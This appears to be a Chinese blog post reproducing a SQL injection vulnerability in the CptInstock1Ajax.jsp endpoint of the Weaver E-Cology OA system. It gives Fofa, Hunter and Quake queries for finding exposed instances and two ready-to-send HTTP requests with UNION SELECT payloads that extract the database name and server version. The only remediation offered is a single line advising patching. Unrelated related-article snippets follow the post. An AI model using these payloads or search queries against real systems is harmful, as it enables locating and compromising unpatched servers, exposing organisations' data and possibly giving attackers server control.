泛微E-Cology系统 CptInstock1Ajax SQL注入漏洞复现

news/2024/10/19 20:23:31/

0x01 产品描述:

 ‌   泛微E-Cology是一款专为中大型组织设计的数字化办公系统,旨在创建高效协同的办公环境。‌ 该系统集成了智能化、平台化和全程数字化的特点,通过智能语音交互、与其他异构系统的集成以及电子印章、电子签名等技术的应用,实现了组织的全面数字化转型‌

0x02 漏洞描述:

        泛微 E-Cology OA协同商务系统前台CptInstock1Ajax接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。 

0x03 搜索语句:

Fofa:app="泛微-OA(e-cology)"

Hunter:body="/wui/common/page/sysRemind.jsp"

Quake:body="/wui/common/page/sysRemind.jsp"

0x04 漏洞复现:

数据库查询:

GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+DB_Name(),1# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 版本查询:

GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

0x05 修复建议:

厂商已发布补丁 请及时修复。


http://www.ppmy.cn/news/1540333.html

相关文章

STM32--基于STM32F103C8T6的OV7670摄像头显示

本文介绍基于STM32F103C8T6实现的OV7670摄像头显示设计(完整资源及代码见文末链接) 一、简介 本文实现的功能:基于STM32F103C8T6实现的OV7670摄像头模组实时在2.2寸TFT彩屏上显示出来 所需硬件: STM32F103C8T6最小系统板、OV76…

Linux-第一章

目录 1.操作系统概述: 学习目标: Ⅰ.了解操作系统的作用: -硬件和软件: -操作系统: Ⅱ.了解常见的操作系统: 2.Linux初识: 学习目标: Ⅰ.了解Linux系统的诞生: …

Gee引擎架设教程:Gee引擎人形怪物设置,MonUseItems配置文件讲解

人形怪物设置说明:1、在Envir目录下增加MonUseItems目录,放置怪的配置文件,见MonUseItems目录2、Monster.DB范例:战士;150;19;0;198;0;100;5000;0;10;10;0;0;0;0;88;45;450;1;0;450;5000;法师;150;19;0;198;0;100;5000;0;10;10;0;…

网页前端开发之HTML入门篇:链接标签 a

链接标签 a <a>是HTML的链接标签&#xff0c;其标签内容的是链接的标题&#xff0c; 它是通过属性来设置链接的地址(URL)。 属性说明 href&#xff1a;其值是链接的地址(URL)&#xff1b;target&#xff1a;其值是指定该如何打开链接&#xff1b; 选项值_self&#xf…

nginx的负载均衡配置和重定向

upstream_check模块 配置文件详情 upstream cluster1{server 10.0.0.4:80 weight1 max_fails3 fail_timeout30s;server 10.0.0.5:80 weight1 max_fsils3 fsil_tomeout;check interval3000 rise2 fall5 timeout1000 typehttp;check interval3000 rise2 fall5 timeout1000…

CTF学习——攻防世界

查看网页源代码的方法 第一种&#xff1a;F12 第二种&#xff1a;鼠标右键→查看网页源代码 第三种&#xff1a;ctrlshiftI 第四种&#xff1a;ctrlU 第五种&#xff1a;在url前面加view-source: 第六种&#xff1a;将网页另存为.html文件&#xff0c;然后用文本编辑器打…

MySQL查看当前客户端连接数的方法

每当有客户端连接到 MySQL 时&#xff0c;MySQL 会为该连接创建一个新的线程来处理所有与该连接相关的查询和操作。所以通过查看MySQL当前的连接线程数量就可以知道有多少客户端连接到MySQL。 方法一 Threads_connected 仅显示活跃的客户端连接数 SHOW STATUS LIKE Threads_…

mysql 慢查询记录

mysql> SHOW VARIABLES LIKE ‘slow_query%’; mysql> SHOW VARIABLES LIKE ‘long_query_time’; slow_query_log&#xff1a;慢查询开启状态 slow_query_log_file&#xff1a;慢查询日志存放的位置&#xff08;一般设置为 MySQL 的数据存放目录&#xff09; long_quer…